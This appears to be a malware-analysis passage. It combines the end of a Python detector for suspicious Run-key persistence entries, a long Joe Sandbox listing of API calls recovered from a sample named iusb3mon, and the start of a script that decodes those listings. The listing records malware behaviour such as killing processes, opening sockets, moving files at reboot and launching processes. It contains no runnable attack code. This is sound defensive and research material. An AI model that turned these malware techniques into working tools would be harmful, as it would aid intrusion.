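        directory, base = directory.lower().rstrip("\\"), base.lower()
        reasons = []
        if base in SYSTEM_BINARIES and directory not in SYSTEM_DIRS:
            reasons.append(f"system binary name {base} outside the Windows directories")
        elif base not in SYSTEM_BINARIES and any(
            osa_distance(base, real) == 1 for real in SYSTEM_BINARIES
        ):
            reasons.append(f"{base} is one edit away from a system binary name")
        if directory in DROP_DIRS:
            reasons.append(f"image written directly into {directory}")
        if reasons:
            findings[name] = reasons
    return findings


def collect_hkcu_run() -> dict:
    """Read the live HKCU Run key on Windows; elsewhere use the constructed sample."""
    if sys.platform != "win32":
        return dict(SAMPLE_RUN_VALUES)
    import winreg
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            values[name] = str(data)
            i += 1
    return values


if __name__ == "__main__":
    for name, reasons in triage_run_entries(collect_hkcu_run()).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Run against the constructed values, the two lookalike entries are reported with two reasons each and the two benign ones are silent; HKLM's Run key, RunOnce and the scheduled task the report also lists (schtasks.exe) are separate persistence points this check does not cover.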
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06248854
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248873
                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 06248881
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 062488B2
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062488BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressCriticalDeleteFreeH_prologLoadProcSection
                                                                                                                    • String ID: closesocket$ws2_32.dll
                                                                                                                    • API String ID: 3065476401-181964208
                                                                                                                    • Opcode ID: aba1995c0c994562abd121335131d23c172fa795398c11fc665b1d3679261530
                                                                                                                    • Instruction ID: 7a31a5b1be46cd9a9e00b43a9e0d2643b9fb1d8668e8c5da5d401e6a79fedf6d
                                                                                                                    • Opcode Fuzzy Hash: aba1995c0c994562abd121335131d23c172fa795398c11fc665b1d3679261530
                                                                                                                    • Instruction Fuzzy Hash: 3D019675E20306DFD764AFA8D84C66EB7B9FF04321F114A29ED62E2180D774DA44CB51
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,0626CC34), ref: 06243D93
                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 06243DA1
                                                                                                                    • GetTickCount.KERNEL32 ref: 06243DA7
                                                                                                                    • wsprintfA.USER32 ref: 06243DC1
                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 06243DD8
                                                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 06243DE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                                                                    • String ID: %s\%d.bak
                                                                                                                    • API String ID: 830686190-2116986511
                                                                                                                    • Opcode ID: 110cc4935ae38767ecf841f97b6d4b614861ade578979b782863b3a595befe39
                                                                                                                    • Instruction ID: e261eebb1849589546fa17b1fdab31acb5ac5f2a21fe9d828fe63996165cff18
                                                                                                                    • Opcode Fuzzy Hash: 110cc4935ae38767ecf841f97b6d4b614861ade578979b782863b3a595befe39
                                                                                                                    • Instruction Fuzzy Hash: 3DF0F4B6800328EBCB10DBA4ED8DFCB777DEB14311F000191B759D2054DA749684DFA1
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250843
                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,0624B640), ref: 06250857
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250883
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0624B640), ref: 062508BB
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0624B640), ref: 062508DD
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0624B640), ref: 062508F6
                                                                                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0624B640), ref: 06250909
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 06250947
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1823725401-0
                                                                                                                    • Opcode ID: 1ec41ff3531167576a12be2d9a4cecf71b2f5673bee0ed1c1dabdd9a4e6b26ee
                                                                                                                    • Instruction ID: 0040c7eac246d0ab96099f601859dbd4bf0e5d2739c2c63d4c5ff62e8bb1dac6
                                                                                                                    • Opcode Fuzzy Hash: 1ec41ff3531167576a12be2d9a4cecf71b2f5673bee0ed1c1dabdd9a4e6b26ee
                                                                                                                    • Instruction Fuzzy Hash: A831F4729343175FEBB03F756C8C93F769DEA497947074529FE92C3104EA719C408AA2
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06243446
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06243497
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 062434EF
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,00000000,00000128,00000000,?,00000002,00000000), ref: 062434FF
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 06243509
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06243510
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$NextProcess$CloseCreateDecrementFirstH_prologHandleInterlockedOpenSnapshotTerminateToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87439402-0
                                                                                                                    • Opcode ID: d17f99585bef53ea96c58c12dbc1465bfddf35ad76b38be92f363edd9f5881cf
                                                                                                                    • Instruction ID: 29ec2ec1702e3f26f58a3af364094d4ba6b43a000911dcf1f743fbb53bf904c4
                                                                                                                    • Opcode Fuzzy Hash: d17f99585bef53ea96c58c12dbc1465bfddf35ad76b38be92f363edd9f5881cf
                                                                                                                    • Instruction Fuzzy Hash: 6831727182022AAEDBE5FBA0DC909FE7B78FF05350F114159ED26E6090DF788B45CA61
                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32(?), ref: 0625B6AA
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 0625B6B6
                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0625B6C8
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0625B6EB
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0625B6F3
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0625B700
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0625B70D
                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0625B72B
                                                                                                                      • Part of subcall function 0625B94C: GlobalFlags.KERNEL32(?), ref: 0625B956
                                                                                                                      • Part of subcall function 0625B94C: GlobalUnlock.KERNEL32(?), ref: 0625B96D
                                                                                                                      • Part of subcall function 0625B94C: GlobalFree.KERNEL32(?), ref: 0625B978
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168474834-0
                                                                                                                    • Opcode ID: 084c55ca784d882936019f20e21ee35040134187f26fb08dc86945ab97664b5e
                                                                                                                    • Instruction ID: 4db4af1f3602dce36935f101df5998e68bf3b735abfe03bd450f1083dc0685ef
                                                                                                                    • Opcode Fuzzy Hash: 084c55ca784d882936019f20e21ee35040134187f26fb08dc86945ab97664b5e
                                                                                                                    • Instruction Fuzzy Hash: 3C119E72920204BAEBB16BB5CC49EBFBABEEF85701F124419FE08C5021D631D940DB60
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNEL32(0624E9E9,0624E9E9,00000000,00000000,00000001,000000FF,0625E590,00000000,?,?,00000000,00000000,0626EE8C), ref: 0625210C
                                                                                                                    • GetLastError.KERNEL32 ref: 06252114
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06252151
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0625215E
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06252167
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06252174
                                                                                                                    • CloseHandle.KERNEL32(0624EA45), ref: 06252184
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 966596688-0
                                                                                                                    • Opcode ID: 51a03115625cb7e9fd64120cd145f3fdd020c4fbb3cfd1e4013b75316ee4d8a5
                                                                                                                    • Instruction ID: d0ce2d6db5ce1686b3942b214a97c005f2ce82f4d707495f17472fcd4261305d
                                                                                                                    • Opcode Fuzzy Hash: 51a03115625cb7e9fd64120cd145f3fdd020c4fbb3cfd1e4013b75316ee4d8a5
                                                                                                                    • Instruction Fuzzy Hash: A0613771D2130ADFDB719FA8CC88AAEBBB5EF45310F168056ED21AB191C7719601CB50
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D1BD3
                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001D1C1F
                                                                                                                    • __Getctype.LIBCPMT ref: 001D1C38
                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001D1C54
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D1CE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                    • String ID: bad locale name
                                                                                                                    • API String ID: 1840309910-1405518554
                                                                                                                    • Opcode ID: d2103a5ed9bb33274841ad58a8826034fdf11974f3d775959b60a8bce6711cd9
                                                                                                                    • Instruction ID: c0f167747f829bb9ecf238143345303c2fc2cef3d0f2384ccdd04c53a1ee1b42
                                                                                                                    • Opcode Fuzzy Hash: d2103a5ed9bb33274841ad58a8826034fdf11974f3d775959b60a8bce6711cd9
                                                                                                                    • Instruction Fuzzy Hash: 8C5152B1D00348ABDF10DFE4D945B9EBBB8AF24714F18412AEC14AB341E775E909CB92
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 0624420B
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0624422E
• CloseHandle.KERNEL32(00000000,?,?), ref: 06244240
• wsprintfA.USER32 ref: 06244271
• lstrcpyA.KERNEL32(?,?,?,?), ref: 0624428A
  • Part of subcall function 06243FC8: wsprintfA.USER32 ref: 062440AA
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Filewsprintf$CloseCreateHandleWritelstrcpy
• String ID: %s %s
• API String ID: 3555437440-2939940506
• Opcode ID: 99151558458be4deab84ede2bfb914dcfba373c8107de2c3af5461267d57fd48
• Instruction ID: 5a152132b103a35759240efae1ab5833b676d423f75209e39cf01de3274ae3a5
• Opcode Fuzzy Hash: 99151558458be4deab84ede2bfb914dcfba373c8107de2c3af5461267d57fd48
• Instruction Fuzzy Hash: 3E315A729102196AEB64FA74EC89FDB77BCEB04314F400552FA09E6480EA719A84CB60
APIs
  • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
  • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
  • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
  • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
  • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
• ResetEvent.KERNEL32(?,00000000,?,00000000,?,?,06245555,?,00000000), ref: 06241451
• socket.WS2_32(00000002,00000001,00000006), ref: 06241460
• gethostbyname.WS2_32(?), ref: 06241471
• htons.WS2_32(?), ref: 06241486
• connect.WS2_32(?,00000002,00000010), ref: 062414A3
• setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 062414C8
• WSAIoctl.WS2_32(?,98000004,00000000,0000000C,00000000,00000000,?,00000000,00000000), ref: 062414F9
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
• String ID:
• API String ID: 4281462294-0
• Opcode ID: 8740adb573cb1ebb61ae595d591e70b0130f6f84cdc55d214e4d2b8d05794ec1
• Instruction ID: 8be86116eb7aa3cb24fdd0e9bf7c5afca33fd11f5479cf317c902bbb53c3e339
• Opcode Fuzzy Hash: 8740adb573cb1ebb61ae595d591e70b0130f6f84cdc55d214e4d2b8d05794ec1
• Instruction Fuzzy Hash: 7731E871910309BFDB209FA4DC89DAEBBBDFF04354F004515F651A6190C7719A54DB60
APIs
• SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244DBD
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06244E10
• GetFileSize.KERNEL32(00000000,00000000), ref: 06244E21
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06244E3C
  • Part of subcall function 06244D3F: LocalAlloc.KERNEL32(00000040,?), ref: 06244D52
  • Part of subcall function 06244D3F: LocalFree.KERNEL32(00000000,00000000,?), ref: 06244D7A
• CloseHandle.KERNEL32(?), ref: 06244E59
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
• String ID: .dat
• API String ID: 3272996501-100240174
• Opcode ID: be3de2ecaaf16cfa10acb8af61610b5029db86aed8a5a2259b33ae81a73cbd13
• Instruction ID: 17d1868a1afb254f73b03678a9f707ece38503ff0741133cdd1419040d98f832
• Opcode Fuzzy Hash: be3de2ecaaf16cfa10acb8af61610b5029db86aed8a5a2259b33ae81a73cbd13
• Instruction Fuzzy Hash: D2219571D5030CBAEB65AAA49C8AFDF7B7DEB08344F0005A5F714E2140D6B09A848B60
APIs
  • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
  • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
• lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 06244421
• lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 06244446
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0624448C
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$CreateFreeLoadProcesslstrcpylstrlen
• String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
• API String ID: 326945973-490771695
• Opcode ID: bacab98272abc6c1fc7b19690166cf967594886a1a64dc83d004e4eedbe9dd90
• Instruction ID: 0dbb57d8da92101c5ddb55f6cca1257e5f3a4659c4b17b9793ee19ec2fccab87
• Opcode Fuzzy Hash: bacab98272abc6c1fc7b19690166cf967594886a1a64dc83d004e4eedbe9dd90
• Instruction Fuzzy Hash: 24119372911629AADBA4AAE1DC4CFDF7BBCFF40791F004411BE09E6140DA749685CBA0
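The "APIs" listings for the recovered functions above record each call with its raw stack arguments in hex, which is exact but slow to read: the socket function, for instance, is only recognisable as a TCP client with tuned keepalive once 0000FFFF/00000008 is read as SOL_SOCKET/SO_KEEPALIVE and 98000004 as SIO_KEEPALIVE_VALS. The following Python is an added example, not part of the Joe Sandbox report: it parses lines in the report's "• api.module(args), ref: addr" format (including the "Part of subcall function" prefix) and substitutes the documented Win32/Winsock constant names for the argument positions it knows. The constant tables and the behavioural tags are the example's own and cover only the calls seen on this page; the sample input is copied from the socket and file-write functions listed above.

```python
"""Decode Joe Sandbox 'APIs' lines into readable Win32 calls (added example)."""
import re
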